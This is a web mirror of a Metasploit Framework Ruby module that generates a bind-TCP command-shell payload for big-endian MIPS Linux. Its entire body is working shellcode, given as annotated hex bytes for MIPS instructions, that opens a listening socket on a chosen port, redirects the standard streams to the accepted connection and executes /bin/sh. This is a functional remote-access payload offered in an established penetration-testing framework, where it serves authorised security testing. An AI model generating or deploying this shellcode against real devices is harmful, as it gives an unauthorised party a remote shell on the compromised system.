Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
module MetasploitModule
7
CachedSize = 232
8
9
include Msf::Payload::Single
10
include Msf::Sessions::CommandShellOptions
11
12
def initialize(info = {})
13
super(
14
merge_info(
15
info,
16
'Name' => 'Linux Command Shell, Bind TCP Inline',
17
'Description' => 'Listen for a connection and spawn a command shell',
18
'Author' => [
19
'scut', # Original mips-irix-portshell shellcode
20
'vaicebine', # Original shellcode mod
21
'Vlatko Kosturjak', # Metasploit module (mipsle)
22
'juan vazquez' # mipsbe conversion plus small fixes and optimizations
23
],
24
'License' => MSF_LICENSE,
25
'Platform' => 'linux',
26
'Arch' => ARCH_MIPSBE,
27
'Handler' => Msf::Handler::BindTcp,
28
'Session' => Msf::Sessions::CommandShellUnix,
29
'Payload' => {
30
'Offsets' => {},
31
'Payload' => ''
32
}
33
)
34
)
35
end
36
37
def generate(_opts = {})
38
if !datastore['LPORT']
39
return super
40
end
41
42
port = Integer(datastore['LPORT'])
43
port = [port].pack('n').unpack('cc')
44
45
shellcode =
46
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
47
"\x27\xbd\xff\xe0" + # addiu sp,sp,-32
48
"\x24\x0e\xff\xfd" + # li t6,-3
49
"\x01\xc0\x20\x27" + # nor a0,t6,zero
50
"\x01\xc0\x28\x27" + # nor a1,t6,zero
51
"\x28\x06\xff\xff" + # slti a2,zero,-1
52
"\x24\x02\x10\x57" + # li v0,4183 ( __NR_socket )
53
"\x01\x01\x01\x0c" + # syscall
54
55
# bind(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
56
"\x30\x50\xff\xff" + # andi s0,v0,0xffff
57
"\x24\x0e\xff\xef" + # li t6,-17 ; t6: 0xffffffef
58
"\x01\xc0\x70\x27" + # nor t6,t6,zero ; t6: 0x10 (16)
59
"\x24\x0d\xff\xfd" + # li t5,-3 ; t5: -3
60
"\x01\xa0\x68\x27" + # nor t5,t5,zero ; t5: 0x2
61
"\x01\xcd\x68\x04" + # sllv t5,t5,t6 ; t5: 0x00020000
62
"\x24\x0e" + port.pack('C2') + # li t6,0xFFFF (port) ; t6: 0x115c (4444 (default LPORT))
63
"\x01\xae\x68\x25" + # or t5,t5,t6 ; t5: 0x0002115c
64
"\xaf\xad\xff\xe0" + # sw t5,-32(sp)
65
"\xaf\xa0\xff\xe4" + # sw zero,-28(sp)
66
"\xaf\xa0\xff\xe8" + # sw zero,-24(sp)
67
"\xaf\xa0\xff\xec" + # sw zero,-20(sp)
68
"\x02\x10\x20\x25" + # or a0,s0,s0
69
"\x24\x0e\xff\xef" + # li t6,-17
70
"\x01\xc0\x30\x27" + # nor a2,t6,zero
71
"\x23\xa5\xff\xe0" + # addi a1,sp,-32
72
"\x24\x02\x10\x49" + # li v0,4169 ( __NR_bind )A
73
"\x01\x01\x01\x0c" + # syscall
74
75
# listen(3, 257) = 0
76
"\x02\x10\x20\x25" + # or a0,s0,s0
77
"\x24\x05\x01\x01" + # li a1,257
78
"\x24\x02\x10\x4e" + # li v0,4174 ( __NR_listen )
79
"\x01\x01\x01\x0c" + # syscall
80
81
# accept(3, 0, NULL) = 4
82
"\x02\x10\x20\x25" + # or a0,s0,s0
83
"\x28\x05\xff\xff" + # slti a1,zero,-1
84
"\x28\x06\xff\xff" + # slti a2,zero,-1
85
"\x24\x02\x10\x48" + # li v0,4168 ( __NR_accept )
86
"\x01\x01\x01\x0c" + # syscall
87
88
# dup2(4, 2) = 2
89
# dup2(4, 1) = 1
90
# dup2(4, 0) = 0
91
"\xaf\xa2\xff\xff" + # sw v0,-1(sp) # socket
92
"\x24\x11\xff\xfd" + # li s1,-3
93
"\x02\x20\x88\x27" + # nor s1,s1,zero
94
"\x8f\xa4\xff\xff" + # lw a0,-1(sp)
95
"\x02\x20\x28\x21" + # move a1,s1 # dup2_loop
96
"\x24\x02\x0f\xdf" + # li v0,4063 ( __NR_dup2 )
97
"\x01\x01\x01\x0c" + # syscall 0x40404
98
"\x24\x10\xff\xff" + # li s0,-1
99
"\x22\x31\xff\xff" + # addi s1,s1,-1
100
"\x16\x30\xff\xfa" + # bne s1,s0 <dup2_loop>
101
102
# execve("//bin/sh", ["//bin/sh"], [/* 0 vars */]) = 0
103
"\x28\x06\xff\xff" + # slti a2,zero,-1
104
"\x3c\x0f\x2f\x2f" + # lui t7,0x2f2f "//"
105
"\x35\xef\x62\x69" + # ori t7,t7,0x6269 "bi"
106
"\xaf\xaf\xff\xec" + # sw t7,-20(sp)
107
"\x3c\x0e\x6e\x2f" + # lui t6,0x6e2f "n/"
108
"\x35\xce\x73\x68" + # ori t6,t6,0x7368 "sh"
109
"\xaf\xae\xff\xf0" + # sw t6,-16(sp)
110
"\xaf\xa0\xff\xf4" + # sw zero,-12(sp)
111
"\x27\xa4\xff\xec" + # addiu a0,sp,-20
112
"\xaf\xa4\xff\xf8" + # sw a0,-8(sp)
113
"\xaf\xa0\xff\xfc" + # sw zero,-4(sp)
114
"\x27\xa5\xff\xf8" + # addiu a1,sp,-8
115
"\x24\x02\x0f\xab" + # li v0,4011 ( __NR_execve )
116
"\x01\x01\x01\x0c" # syscall 0x40404
117
118
return super + shellcode
119
end
120
end
121
122